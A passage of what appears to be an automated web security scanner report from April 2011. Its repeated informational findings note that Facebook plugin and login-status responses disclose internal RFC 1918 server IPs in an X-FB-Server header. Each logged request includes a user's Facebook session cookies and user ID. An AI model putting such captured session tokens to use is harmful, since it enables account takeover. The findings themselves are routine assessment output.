Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.121.59
X-Cnection: close
Date: Sat, 09 Apr 2011 13:33:48 GMT
Content-Length: 0

14.93. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.118.28
X-Cnection: close
Date: Sat, 09 Apr 2011 14:54:39 GMT
Content-Length: 0

14.94. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.142.21
X-Cnection: close
Date: Sat, 09 Apr 2011 15:35:04 GMT
Content-Length: 0

14.95. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.133.115
Connection: close
Date: Sat, 09 Apr 2011 14:34:26 GMT
Content-Length: 0

14.96. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.251.105
X-Cnection: close
Date: Sat, 09 Apr 2011 12:29:48 GMT
Content-Length: 0

14.97. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.83.83
X-Cnection: close
Date: Sat, 09 Apr 2011 15:14:52 GMT
Content-Length: 0

14.98. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=a6426f0a6eab8c332a3923e4c87d561d&extern=0&channel=http%3A%2F%2Fwww.wptz.com%2Fsh%2Ffacebook%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/extern/login_status.php?api_key=a6426f0a6eab8c332a3923e4c87d561d&extern=0&channel=http%3A%2F%2Fwww.wptz.com%2Fsh%2Ffacebook%2Fxd_receiver.htm&locale=en_US
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.245.112
X-Cnection: close
Date: Sat, 09 Apr 2011 12:31:09 GMT
Content-Length: 0

14.99. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.27.41
X-Cnection: close
Date: Mon, 11 Apr 2011 16:31:13 GMT
Content-Length: 0

14.100. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.112.33
X-Cnection: close
Date: Mon, 11 Apr 2011 17:31:15 GMT
Content-Length: 0

14.101. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.197.111
X-Cnection: close
Date: Mon, 11 Apr 2011 16:41:14 GMT
Content-Length: 0

14.102. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.54.106
X-Cnection: close
Date: Mon, 11 Apr 2011 17:21:15 GMT
Content-Length: 0

14.103. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.50
X-Cnection: close
Date: Mon, 11 Apr 2011 17:51:16 GMT
Content-Length: 0

14.104. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.55.42
X-Cnection: close
Date: Mon, 11 Apr 2011 16:51:13 GMT
Content-Length: 0

14.105. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.86.73
X-Cnection: close
Date: Mon, 11 Apr 2011 17:41:15 GMT
Content-Length: 0

14.106. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.154.108
Connection: close
Date: Mon, 11 Apr 2011 17:01:14 GMT
Content-Length: 0

14.107. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.246.43
X-Cnection: close
Date: Mon, 11 Apr 2011 16:21:16 GMT
Content-Length: 0

14.108. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/activity.php?site=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&width=336&height=275&header=true&colorscheme=light&recommendations=false&filter=politics
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.253.38
X-Cnection: close
Date: Mon, 11 Apr 2011 17:11:14 GMT
Content-Length: 0

14.109. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.wcax.com/Global/story.asp?S=14408230&layout=after&show_faces=false&width=630&height=26&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.35
X-Cnection: close
Date: Sat, 09 Apr 2011 12:59:30 GMT
Content-Length: 867

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=9195"+"&m="+m;},5000)
...[SNIP]...
14.110. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.wcax.com/Global/story.asp?S=14408244&layout=after&show_faces=false&width=630&height=26&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.240.114
X-Cnection: close
Date: Sat, 09 Apr 2011 12:34:27 GMT
Content-Length: 867

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=1372"+"&m="+m;},5000)
...[SNIP]...
14.111. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.wcax.com/Global/story.asp?S=452989&layout=after&show_faces=false&width=630&height=26&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.83.47
X-Cnection: close
Date: Sat, 09 Apr 2011 13:16:05 GMT
Content-Length: 860

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=896"+"&m="+m;},5000);
...[SNIP]...
14.112. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.wcax.com/Global/story.asp?S=503137&layout=after&show_faces=false&width=630&height=26&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.153.35
X-Cnection: close
Date: Sat, 09 Apr 2011 12:35:52 GMT
Content-Length: 861

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=3216"+"&m="+m;},5000)
...[SNIP]...
14.113. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

